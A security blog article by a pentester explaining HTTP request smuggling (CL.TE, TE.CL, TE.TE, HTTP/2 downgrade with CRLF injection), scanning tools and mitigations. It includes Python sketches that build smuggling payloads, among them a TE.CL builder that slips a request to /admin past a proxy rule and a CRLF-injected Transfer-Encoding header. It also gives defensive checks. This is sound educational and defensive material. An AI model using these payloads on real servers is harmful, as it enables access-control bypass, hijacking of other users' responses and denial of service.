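HTTP request smuggling is a vulnerability that exploits differences in how servers handle the Content-Length and Transfer-Encoding headers, allowing an attacker to inject malicious requests or bypass security controls. The attack relies on the front-end and back-end servers parsing HTTP/1.1 differently, and can lead to hidden request injection, hijacked communications or DoS attacks. Mitigations include rejecting requests with ambiguous headers, avoiding connection reuse and deploying a WAF. 2025-3-13 15:9:36 Author: www.vaadata.com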

When a client accesses a website, it communicates with the server through the HTTP protocol. Initially text-based, this protocol became binary with HTTP/2, but its operation is still based on TCP.

Each exchange begins with the creation of a connection between the client and the server. With HTTP/1.0, this connection was closed after each request. But with HTTP/1.1, the Keep-Alive mode became the norm, allowing the connection to be kept open for several successive exchanges.

HTTP/1.1 also saw the introduction of the Transfer-Encoding header, which indicates how the body of the request is encoded for transfer (for example, split into chunks) and therefore how its length is determined. This development, although beneficial in terms of performance and efficiency, also introduced new vulnerabilities.
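To make the chunked form of Transfer-Encoding concrete, here is a minimal Python sketch of how a body is framed with it. The function name `encode_chunked` and the chunk size are illustrative assumptions, not part of any library.

```python
def encode_chunked(body: bytes, chunk_size: int = 8) -> bytes:
    """Frame `body` using HTTP/1.1 chunked transfer coding (illustrative helper)."""
    out = bytearray()
    for i in range(0, len(body), chunk_size):
        chunk = body[i:i + chunk_size]
        # Each chunk is: size in hexadecimal, CRLF, the data, CRLF.
        out += f"{len(chunk):x}".encode("ascii") + b"\r\n" + chunk + b"\r\n"
    # A zero-length chunk followed by an empty line terminates the body.
    out += b"0\r\n\r\n"
    return bytes(out)


encoded = encode_chunked(b"hello world", chunk_size=8)
print(encoded)
```

With chunked coding the end of the body is signalled by the `0` chunk rather than by a byte count, which is why a server that counts bytes and a server that reads chunks can disagree on where a request ends.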

These include HTTP request smuggling, an attack that exploits inconsistencies in the processing of HTTP requests by servers and proxies.

In this article, we take a closer look at how HTTP request smuggling works, its different variants and strategies for protecting against it.

Comprehensive Guide to HTTP Request Smuggling

What is HTTP Request Smuggling?

HTTP request smuggling is a vulnerability that allows an attacker to manipulate requests as they pass through an intermediary server, often a proxy or a load balancer, on their way to the back-end server.

By manipulating the way these systems interpret the Content-Length and Transfer-Encoding headers, it is possible to inject malicious requests, bypass security controls or execute actions without the knowledge of legitimate users.

This vulnerability exploits differences in the interpretation of HTTP requests between several servers on the same infrastructure.

For a request smuggling attack to be possible, two conditions must be met:

- The target server must be placed behind an intermediary server (reverse proxy, load balancer, etc.).

- One or both of the servers must be using the HTTP/1.1 protocol, as this attack is not possible when HTTP/2 is used end to end.

HTTP Request Smuggling attack principle

The aim of an HTTP request smuggling attack is to desynchronise communication between the front-end server (proxy or load balancer) and the back-end server. This desynchronisation occurs when these two servers interpret the size of the body of an HTTP request differently.

The problem arises mainly from the coexistence of the Content-Length and Transfer-Encoding headers. Normally, a server uses Content-Length to define the size of the content of a request. However, if one of the servers supports Transfer-Encoding, but the other does not, ambiguity can arise.

By exploiting this confusion, an attacker can:

- Inject malicious requests into the communication flow.

- Force other users to execute requests without their knowledge.

- Intercept HTTP responses intended for other users.

- Pollute a server’s response queue, causing malfunctions similar to a DoS attack, while allowing sensitive information to be stolen.

Understanding desynchronisation via Content-Length and Transfer-Encoding

When an HTTP request contains both the Content-Length and Transfer-Encoding headers, it should be rejected with a 400 Bad Request error. However, if this is not the case, and the receiving server supports Transfer-Encoding, it is this header that will be used to determine the size of the request body.

The problem arises when the two servers involved in processing the request do not interpret these headers in the same way. If only one of the two servers recognises Transfer-Encoding, while the other uses Content-Length, desynchronisation can occur.

The backend server may then not read the entire body of the request, leaving an unused part which will be interpreted as the start of a new request during the next exchange, provided that the connection between the frontend and the backend remains open.
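The leftover bytes described above can be reproduced with a small simulation. This is a sketch under stated assumptions: the host `example.test` and the helper names are hypothetical, and the two functions are deliberately simplified stand-ins for a server that trusts Content-Length and a server that trusts Transfer-Encoding.

```python
RAW = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.test\r\n"          # hypothetical host
    b"Content-Length: 13\r\n"          # 13 = len(b"0\r\n\r\nSMUGGLED")
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"SMUGGLED"
)


def split_head(raw: bytes):
    """Return (headers dict with lowercased names, bytes after the blank line)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, rest


def body_by_content_length(raw: bytes):
    """Server that only trusts Content-Length: returns (body, leftover)."""
    headers, rest = split_head(raw)
    n = int(headers[b"content-length"])
    return rest[:n], rest[n:]


def body_by_chunked(raw: bytes):
    """Server that only trusts Transfer-Encoding: chunked: returns (body, leftover)."""
    _, rest = split_head(raw)
    body = b""
    while True:
        size_line, _, rest = rest.partition(b"\r\n")
        size = int(size_line, 16)
        if size == 0:
            # Skip the CRLF that closes the (empty) trailer section.
            return body, rest[2:]
        body += rest[:size]
        rest = rest[size + 2:]  # skip the chunk data and its trailing CRLF


print(body_by_content_length(RAW))  # whole body consumed, nothing left over
print(body_by_chunked(RAW))         # empty body, b"SMUGGLED" left on the connection
```

The first server forwards all 13 bytes as one request, while the second stops at the `0` chunk and keeps `SMUGGLED` in its buffer as the start of the next request.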

Several configurations can lead to desynchronisation:

- CL.TE: The frontend server ignores Transfer-Encoding, but the backend interprets it.

- TE.CL: The frontend recognises Transfer-Encoding, but the backend does not use it.

- TE.TE: Both servers support Transfer-Encoding, but one of them ignores the header if its syntax is malformed.

The last case (TE.TE) exploits a difference in interpretation (differential parsing) between the reverse proxy and the backend server. A specially crafted request can thus cause desynchronisation and enable request smuggling attacks.
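The differential parsing behind TE.TE can be sketched with two toy header matchers. Both functions are hypothetical and do not model any particular server; they only show how a slightly malformed header can be honoured by one parser and ignored by another.

```python
def strict_sees_chunked(header_line: str) -> bool:
    """Hypothetical strict parser: exact name, no stray whitespace, exact value."""
    name, sep, value = header_line.partition(":")
    return (
        sep == ":"
        and name == name.strip()
        and name.lower() == "transfer-encoding"
        and value.strip().lower() == "chunked"
    )


def lenient_sees_chunked(header_line: str) -> bool:
    """Hypothetical lenient parser: trims the name and does a substring match."""
    name, _, value = header_line.partition(":")
    return name.strip().lower() == "transfer-encoding" and "chunked" in value.lower()


candidates = [
    "Transfer-Encoding: chunked",    # well-formed: both parsers agree
    "Transfer-Encoding : chunked",   # space before the colon
    "Transfer-Encoding: xchunked",   # unknown coding that contains "chunked"
]

# Header lines on which the two parsers disagree are TE.TE candidates.
disagreements = [
    line for line in candidates
    if strict_sees_chunked(line) != lenient_sees_chunked(line)
]
print(disagreements)
```

Any line in `disagreements` makes one server fall back to Content-Length while the other uses chunked coding, which reduces the situation to CL.TE or TE.CL.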

Overall, these scenarios are based on the same principle: forcing servers to interpret an HTTP request differently, thus opening the door to stealth injections and hijacking of communication flows.

Exploitation of an HTTP Request Smuggling Vulnerability



One of the most common attack scenarios consists of exploiting desynchronisation to inject a prohibited request through the reverse proxy, without it detecting it.

In practice, the reverse proxy will only analyse the first request and judge it to be compliant with the defined access rules. However, in the background, the backend server will actually receive two separate requests:

- The first, legitimate, which complies with the restrictions imposed.

- The second, hidden, targets a resource that is normally inaccessible to a standard user.

This allows an attacker to bypass reverse proxy-based access controls and access normally protected paths, exposing sensitive data or critical features.
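The bypass can be illustrated with a toy model of both servers reading the same bytes. Everything here is an assumption made for the example: the `/admin` rule, the host `example.test`, and the simplified `request_paths` splitter, which only understands an empty chunked body.

```python
def request_paths(stream: bytes, prefer_chunked: bool) -> list[str]:
    """Split a byte stream into requests and return the path of each one."""
    paths = []
    while stream:
        head, sep, rest = stream.partition(b"\r\n\r\n")
        if not sep:
            break  # incomplete request; a real server would wait for more bytes
        lines = head.split(b"\r\n")
        paths.append(lines[0].split(b" ")[1].decode("ascii"))
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            headers[name.strip().lower()] = value.strip()
        if prefer_chunked and headers.get(b"transfer-encoding") == b"chunked":
            if not rest.startswith(b"0\r\n\r\n"):
                raise ValueError("this sketch only handles an empty chunked body")
            stream = rest[5:]  # skip the terminating "0\r\n\r\n"
        else:
            stream = rest[int(headers.get(b"content-length", b"0")):]
    return paths


def proxy_allows(path: str) -> bool:
    """Hypothetical access rule enforced only on the reverse proxy."""
    return not path.startswith("/admin")


smuggled = b"GET /admin HTTP/1.1\r\nHost: example.test\r\n\r\n"
body = b"0\r\n\r\n" + smuggled
payload = (
    b"POST / HTTP/1.1\r\nHost: example.test\r\n"
    b"Content-Length: %d\r\nTransfer-Encoding: chunked\r\n\r\n" % len(body)
) + body

front_view = request_paths(payload, prefer_chunked=False)  # proxy trusts Content-Length
back_view = request_paths(payload, prefer_chunked=True)    # backend trusts Transfer-Encoding
print(front_view, all(proxy_allows(p) for p in front_view))
print(back_view)
```

The proxy sees a single request to `/` and lets it through, while the backend processes a second request to `/admin` that the proxy never evaluated.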





Initial responses for /admin:

We can see that the reverse proxy route restriction has been bypassed.

Once the reverse proxy restriction has been bypassed, an attacker can exploit the vulnerability to their own advantage. For example, they can target themselves to capture the response to a request that reached the backend server directly, without being filtered by the proxy. This represents a major threat to the access control of a web platform.

However, request smuggling is not limited to this type of attack. It can also be used to:

- Force a user to execute a request involuntarily (the targeted user will be the one who sends the next request).

- Inject malicious code (reflected XSS) to compromise other users.

- Desynchronise the HTTP response queue (response queue poisoning), resulting in incorrect or random responses being displayed to subsequent users.

- Launch a DoS attack by disrupting the processing of requests and responses on the platform.

These scenarios show just how critical and difficult to detect this vulnerability can be.

HTTP/2 Downgrading and Request Smuggling

The HTTP/2 protocol was designed to eliminate several vulnerabilities in HTTP/1.1, in particular by ceasing to use headers to determine the length of requests. In theory, this prevents any exploitation of request smuggling.

However, if a frontend server uses HTTP/2 but rewrites requests in HTTP/1.1 to communicate with a backend, a vulnerability may arise.

In this case, the attacker can exploit this conversion to inject malicious requests and cause desynchronisation similar to classic request smuggling attacks.

CRLF injection and HTTP/2 exploitation



When attempting to exploit request smuggling through an HTTP/2 to HTTP/1.1 downgrade, it is often necessary to use a CRLF injection (Carriage Return Line Feed).

Unlike HTTP/1.1, which is text-based, HTTP/2 is a binary protocol and no longer uses line breaks to delimit headers. A header value can therefore carry a raw \r\n sequence without breaking the HTTP/2 message. When a frontend server converts such a request into HTTP/1.1 without sanitising it, the backend interprets the \r\n as a line break, allowing an attacker to inject additional headers and manipulate the rewritten request.

A typical example of exploitation involves injecting the sequence \r\n into a modifiable header to force the addition of an unanticipated Transfer-Encoding header, resulting in desynchronisation between the proxy and the backend server.
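The header injection described above can be reproduced with a toy downgrade routine. Both functions are hypothetical sketches of what a frontend might do when rewriting HTTP/2 header fields as HTTP/1.1 text; the header name `foo` and the host `example.test` are placeholders.

```python
def naive_downgrade(method: str, path: str, h2_headers: list[tuple[str, str]]) -> bytes:
    """Rewrite HTTP/2 header fields as HTTP/1.1 text without any sanitising."""
    lines = [f"{method} {path} HTTP/1.1"]
    lines += [f"{name}: {value}" for name, value in h2_headers]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def safe_downgrade(method: str, path: str, h2_headers: list[tuple[str, str]]) -> bytes:
    """Same rewrite, but refuse any field containing CR, LF or NUL."""
    for name, value in h2_headers:
        if any(ch in name + value for ch in "\r\n\0"):
            raise ValueError(f"illegal character in header field {name!r}")
    return naive_downgrade(method, path, h2_headers)


h2_headers = [
    ("host", "example.test"),
    ("foo", "bar\r\nTransfer-Encoding: chunked"),  # CRLF hidden inside one value
]

rewritten = naive_downgrade("POST", "/", h2_headers)
header_lines = rewritten.split(b"\r\n\r\n")[0].split(b"\r\n")
print(header_lines)  # the injected Transfer-Encoding now sits on its own line
```

In the HTTP/2 request there are only two header fields, but after the naive rewrite the backend sees three header lines, one of which is a Transfer-Encoding header the frontend never knew about.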

This type of request, once corrupted by CRLF injection, is sometimes referred to as ‘Kettled’, in reference to James Kettle’s research on the subject.

Other variants of request smuggling

Although this article focuses on the classic forms of request smuggling, there are many variations, including:

- Client-side desynchronisation (Client-Side Desync), which desynchronises the connection between the victim's browser and the web server rather than between a frontend and a backend.

- HTTP/2 Request Smuggling, an attack specifically targeting conversion flaws between HTTP/2 and HTTP/1.1.

- Pause-Based Request Smuggling, which exploits processing delays to force desynchronisation.

These advanced techniques enable attackers to exploit the subtleties of communications between servers, underlining the complexity and constant evolution of attacks linked to HTTP protocols.

Exploiting vulnerabilities related to request smuggling can be complex, particularly given the subtleties of desynchronisation between the frontend and backend servers.

Fortunately, there are a number of tools available to automate the detection and exploitation of these vulnerabilities.

Smuggler.py

Smuggler.py is a specialised scanner designed to identify HTTP desynchronisation within a server or a list of hosts. It automates the search for the three main types of request smuggling:

- CL.TE (Content-Length vs Transfer-Encoding).

- TE.CL (Transfer-Encoding vs Content-Length).

- TE.TE (variants exploiting Transfer-Encoding parsing errors).

The tool can also be used to add mutations to refine tests, particularly for TE.TE attacks.

Although it is no longer actively maintained, it remains a relevant choice for scanning large test perimeters and detecting vulnerabilities.

HTTP Request Smuggler

Burp Suite’s HTTP Request Smuggler extension simplifies the exploitation of request smuggling vulnerabilities.

It automates certain critical adjustments, such as calculating the offsets required for TE.CL attacks. The extension relies on Turbo Intruder, an advanced fuzzing tool, to probe server behaviour and optimise attacks.
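To show what kind of offsets are involved in a TE.CL payload, here is a hand-rolled sketch. It is not the extension's code: the function `build_te_cl`, the host `example.test` and the smuggled prefix are all assumptions made for the example.

```python
def build_te_cl(host: str, smuggled: bytes) -> bytes:
    """Build a TE.CL probe: the frontend reads chunks, the backend reads Content-Length."""
    # The chunk size must be the exact length of the smuggled prefix, in hexadecimal.
    size_line = f"{len(smuggled):x}".encode("ascii") + b"\r\n"
    body = size_line + smuggled + b"\r\n" + b"0\r\n\r\n"
    # Content-Length covers only the chunk-size line, so the backend stops
    # right before the smuggled prefix and leaves it on the connection.
    head = (
        b"POST / HTTP/1.1\r\n"
        b"Host: %s\r\n"
        b"Content-Length: %d\r\n"
        b"Transfer-Encoding: chunked\r\n"
        b"\r\n"
    ) % (host.encode("ascii"), len(size_line))
    return head + body


smuggled = b"GET /admin HTTP/1.1\r\nX-Ignore: x"
payload = build_te_cl("example.test", smuggled)
print(payload.decode("ascii"))
```

Two numbers have to stay consistent: the hexadecimal chunk size and the Content-Length. Changing a single byte of the smuggled prefix means recomputing both, which is the tedious part that tooling takes care of.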

By combining these tools with an in-depth understanding of how HTTP servers and proxies work, it becomes possible to effectively detect and exploit request smuggling vulnerabilities, particularly in environments where differences in request processing can be manipulated for malicious purposes.

How to Prevent HTTP Request Smuggling?

Request smuggling is based on a weakness in the HTTP/1.1 protocol. If all the servers on a platform use HTTP/2, this attack becomes impossible, as the differences in interpretation between the frontend and backend no longer exist.

However, migrating to HTTP/2 is not always an immediate option. In this case, several measures can be put in place to protect against this vulnerability:

- Reject ambiguous requests containing both Content-Length and Transfer-Encoding, on both the frontend and the backend.

- Avoid reusing connections between the frontend server and the backend in order to prevent the persistence of out-of-sync requests.

- Deploy a WAF configured to detect and block attempts to exploit request smuggling.

- Harmonise the technology stack by using the same server for the frontend and backend (such as Nginx), to avoid differences in parsing and interpretation of HTTP requests.
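The first measure in the list can be sketched as a small header check. This is a minimal illustration, assuming headers are available as raw (name, value) pairs before normalisation; the function `is_ambiguous` is hypothetical, and the last two rules go slightly beyond the list above as extra hardening.

```python
def is_ambiguous(headers: list[tuple[str, str]]) -> bool:
    """Return True if the request framing is ambiguous and should get a 400."""
    names = [name.strip().lower() for name, _ in headers]

    # Rule from the list above: both length-defining headers are present.
    if "content-length" in names and "transfer-encoding" in names:
        return True

    # Extra hardening (assumption): several Content-Length headers that disagree.
    cl_values = {
        value.strip() for name, value in headers
        if name.strip().lower() == "content-length"
    }
    if len(cl_values) > 1:
        return True

    # Extra hardening (assumption): whitespace around a header name,
    # a common way to hide a header from one of the two parsers.
    if any(name != name.strip() for name, _ in headers):
        return True

    return False


print(is_ambiguous([("Content-Length", "13"), ("Transfer-Encoding", "chunked")]))
print(is_ambiguous([("Host", "example.test"), ("Content-Length", "13")]))
```

For the check to be effective it has to run on both the frontend and the backend, since a request rejected by only one of them can still be framed differently by the other.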

Strict application of these best practices considerably reduces the risks associated with HTTP request smuggling, and prevents attackers from exploiting this vulnerability to manipulate traffic or intercept requests.

Author: Titouan SALOU – Pentester @Vaadata
